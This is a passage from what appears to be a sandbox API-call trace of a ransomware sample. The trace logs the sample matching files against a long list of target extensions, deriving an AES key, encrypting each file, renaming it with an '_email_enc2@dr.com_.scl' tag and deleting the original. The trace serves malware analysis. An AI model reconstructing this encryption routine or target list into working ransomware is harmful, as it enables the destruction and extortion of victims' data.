z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0163.248] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0163.249] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0163.249] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0163.255] ReadFile (in: hFile=0x39c, lpBuffer=0xfdf190, nNumberOfBytesToRead=0x5765, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdf190*, lpNumberOfBytesRead=0x189930*=0x5765, lpOverlapped=0x0) returned 1
	[0163.259] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.260] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb5d8) returned 1
	[0163.262] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.262] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0163.262] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.262] CryptHashData (hHash=0xfb93f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0163.262] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.263] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb93f0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb9130) returned 1
	[0163.263] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.263] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x5765, dwBufLen=0x5765 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x5770) returned 1
	[0163.264] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0163.264] RtlMoveMemory (in: Destination=0xfe4900, Source=0xfdf190, Length=0x5765 | out: Destination=0xfe4900) 
	[0163.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.264] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe4900*, pdwDataLen=0x1894dc*=0x5765, dwBufLen=0x5770 | out: pbData=0xfe4900*, pdwDataLen=0x1894dc*=0x5770) returned 1
	[0163.265] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.282] CryptDestroyKey (hKey=0xfb9130) returned 1
	[0163.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.282] CryptDestroyHash (hHash=0xfb93f0) returned 1
	[0163.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.283] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0163.283] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0163.283] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0163.284] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.284] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0163.285] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 154
	[0163.285] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0163.286] WriteFile (in: hFile=0x3a0, lpBuffer=0xfe4900*, nNumberOfBytesToWrite=0x5770, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfe4900*, lpNumberOfBytesWritten=0x189938*=0x5770, lpOverlapped=0x0) returned 1
	[0163.290] CloseHandle (hObject=0x3a0) returned 1
	[0163.292] CloseHandle (hObject=0x39c) returned 1
	[0163.292] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml")) returned 1
	[0163.296] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\masterdescriptor.en-us.xml")) returned 0
	[0163.296] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd59215d7, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd59215d7, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="s321033.hash", cAlternateFileName="S32103~1.HAS")) returned 1
	[0163.298] lstrcmpW (lpString1="s321033.hash", lpString2="..") returned 1
	[0163.298] lstrcmpW (lpString1="s321033.hash", lpString2=".") returned 1
	[0163.298] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\"
	[0163.298] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\", lpString2="s321033.hash" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\s321033.hash") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\s321033.hash"
	[0163.298] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\s321033.hash") returned 98
	[0163.298] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0163.299] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\s321033.hash", cchLength=0x62 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\s321033.hash") returned 0x62
	[0163.299] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.299] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\s321033.hash", lpSrch="help_decrypt_your_files") returned 0x0
	[0163.299] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\s321033.hash" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\s321033.hash") returned="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\s321033.hash"
	[0163.299] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\s321033.hash") returned 98
	[0163.299] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0163.300] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.300] StrStrW (lpFirst=".hash", lpSrch=".") returned=".hash"
	[0163.300] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.300] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hash") returned 0x0
	[0163.301] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5924f73, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd5924f73, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x21ebc700, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1
	[0163.301] lstrcmpW (lpString1="stream.x86.en-us.man.dat", lpString2="..") returned 1
	[0163.301] lstrcmpW (lpString1="stream.x86.en-us.man.dat", lpString2=".") returned 1
	[0163.301] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\"
	[0163.301] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\", lpString2="stream.x86.en-us.man.dat" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\stream.x86.en-us.man.dat") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\stream.x86.en-us.man.dat"
	[0163.301] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\stream.x86.en-us.man.dat") returned 110
	[0163.301] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0163.302] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\stream.x86.en-us.man.dat", cchLength=0x6e | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat") returned 0x6e
	[0163.302] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.302] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat", lpSrch="help_decrypt_your_files") returned 0x0
	[0163.302] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat") returned="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat"
	[0163.302] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat") returned 110
	[0163.302] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0163.303] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.303] StrStrW (lpFirst=".dat", lpSrch=".") returned=".dat"
	[0163.303] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.303] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.